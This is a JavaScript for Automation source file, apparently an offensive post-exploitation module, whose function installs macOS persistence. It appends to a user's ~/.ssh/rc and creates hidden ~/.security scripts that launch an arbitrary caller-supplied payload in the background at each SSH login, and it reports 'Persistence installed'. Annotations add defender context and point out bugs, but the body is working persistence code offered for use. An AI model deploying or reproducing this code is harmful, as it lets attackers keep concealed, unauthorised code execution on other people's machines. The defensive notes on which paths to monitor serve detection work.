/**
 * JXA (JavaScript for Automation) routine that writes a shell snippet into a
 * user's ~/.ssh/rc and, optionally, two helper scripts under ~/.security.
 *
 * Defender context: sshd runs ~/.ssh/rc through the user's shell at SSH login
 * unless the server sets `PermitUserRC no`, so anything written here executes
 * on that user's next SSH session. Files this function touches:
 *   - /Users/<userName>/.ssh/rc                (appended to, see notes below)
 *   - /Users/<userName>/.security/             (created when hiddenFiles is "yes")
 *   - /Users/<userName>/.security/apple.sh     (mode 0755)
 *   - /Users/<userName>/.security/update.sh    (mode 0755)
 * Creation or modification of these paths, especially by a scripting host
 * (presumably osascript, which the embedded shell text greps for), is the
 * observable to monitor.
 *
 * @param {string} userName    Account name; concatenated into "/Users/" + userName.
 * @param {string} persist     Text written verbatim to update.sh (hiddenFiles "yes"),
 *                             or substituted for every "payload" token in the rc
 *                             script otherwise.
 * @param {string} hiddenFiles The literal "yes" selects the ~/.security variant;
 *                             any other value selects the rc-only variant.
 * @returns {string} A status message naming the paths written, or the text of
 *                   any exception caught along the way.
 */
function SSHrc(userName, persist, hiddenFiles) {
ObjC.import('Foundation')
ObjC.import("Cocoa");
ObjC.import('stdlib')
var app = Application.currentApplication();
app.includeStandardAdditions = true;
// The home directory is built by string concatenation, not resolved from the system.
var userHome = "/Users/" + userName
// sysVers is read here but not referenced again inside this function.
var sysVers = app.systemInfo().systemVersion
var output = ""
try {
// Opens `file` with write permission, optionally truncates it to zero length,
// then writes `text` at the current end of file and closes the handle.
// With overwriteExistingContent false the text is appended.
function writeTextToFile(text, file, overwriteExistingContent) {
var fileString = file.toString()
var openedFile = app.openForAccess(Path(fileString), {
writePermission: true
})
if (overwriteExistingContent) {
app.setEof(openedFile, {
to: 0
})
}
app.write(text, {
to: openedFile,
startingAt: app.getEof(openedFile)
})
app.closeAccess(openedFile)
}
// Sets POSIX permission bits on `path` through NSFileManager and returns the
// call's result; the callers below ignore that return value.
function chmod(value, path) {
let a = $({
NSFilePosixPermissions: value
})
let p = $(path).stringByStandardizingPath
let e = $()
let r = $.NSFileManager.defaultManager
.setAttributesOfItemAtPathError(a, p, e)
return r
}
//PLACEHOLDER: change based on which process you want to monitor for (e.g. osascript)
// Shell text for apple.sh: counts the lines of `ps ax | grep osascript` and,
// when fewer than 2, changes into ~/.security and starts ./update.sh in the
// background; otherwise it exits.
var payload =
`RUNNING=$(ps ax | grep osascript | wc -l);
if [ "$RUNNING" -lt 2 ]
then
cd ` + userHome + `/.security
./update.sh &
else
exit
fi`
// `profile` holds the path of apple.sh; in the hiddenFiles branch this path
// string is the text appended to ~/.ssh/rc.
var profile = userHome + `/.security/apple.sh`
// Creates a single directory (intermediate directories are not created) and
// discards both the result and the error reference.
function createFolder(path) {
$.NSFileManager.defaultManager.createDirectoryAtPathWithIntermediateDirectoriesAttributesError(path, false, $(), $())
}
var hiddenPath = `` + userHome + `/.security`
// isDir is assigned without var/let, so it is not local to this function.
isDir = Ref()
var hiddenDirectoryExistsCheck = $.NSFileManager.alloc.init.fileExistsAtPathIsDirectory(hiddenPath, isDir)
if (hiddenFiles == "yes") {
// Variant 1: stage two scripts in ~/.security and reference one from ~/.ssh/rc.
if (hiddenDirectoryExistsCheck == false) {
createFolder(hiddenPath)
}
var payloadPath = userHome + '/.security/apple.sh'
// Existing apple.sh and update.sh contents are replaced (overwrite flag true).
writeTextToFile(payload, payloadPath, true)
var persistPath = userHome + '/.security/update.sh'
writeTextToFile(persist, persistPath, true)
// Both scripts become rwxr-xr-x.
chmod(0o755, payloadPath)
chmod(0o755, persistPath)
// profilePath is assigned without var/let, so it is not local to this function.
profilePath = userHome + '/.ssh/rc'
// Appends the apple.sh path to ~/.ssh/rc; earlier rc content is kept.
writeTextToFile(profile, profilePath, false)
// NOTE(review): the message names apple.sh twice; the second file written
// above is update.sh.
output += "Persistence installed at " + userHome + '/.ssh/rc' + " , " + userHome + '/.security/apple.sh' + ",and " + userHome + '/.security/apple.sh'
} else {
// Variant 2: no helper files; the whole script goes into ~/.ssh/rc.
profilePath = userHome + '/.ssh/rc'
// Redeclares `payload` with a template whose "payload" token is replaced by
// the caller-supplied `persist` text and run under nohup with output discarded.
var payload =
`RUNNING=$(ps ax | grep osascript | wc -l);
if [ "$RUNNING" -lt 2 ]
then
nohup payload > /dev/null 2>&1&
else
exit > /dev/null 2>&1&
fi`
var updatedPayload = payload.replace(/payload/g, persist)
var rcFileexistsCheck = $.NSFileManager.alloc.init.fileExistsAtPath(profilePath)
// NOTE(review): the check result is compared with the string "false". If the
// bridge returns a boolean (as the `== false` test on the directory check
// assumes), this comparison is never true and the append branch runs instead.
// Both branches write the same text and report the same message; they differ
// only in the overwrite flag.
if (rcFileexistsCheck == "false") {
writeTextToFile(updatedPayload, profilePath, true)
output += "Persistence installed at " + userHome + '/.ssh/rc'
} else {
writeTextToFile(updatedPayload, profilePath, false)
output += "Persistence installed at " + userHome + '/.ssh/rc'
}
}
} catch (error) {
// Any failure is reported by appending the error text to the returned string;
// nothing is rethrown and files already written are left in place.
output += error.toString()
}
return output
}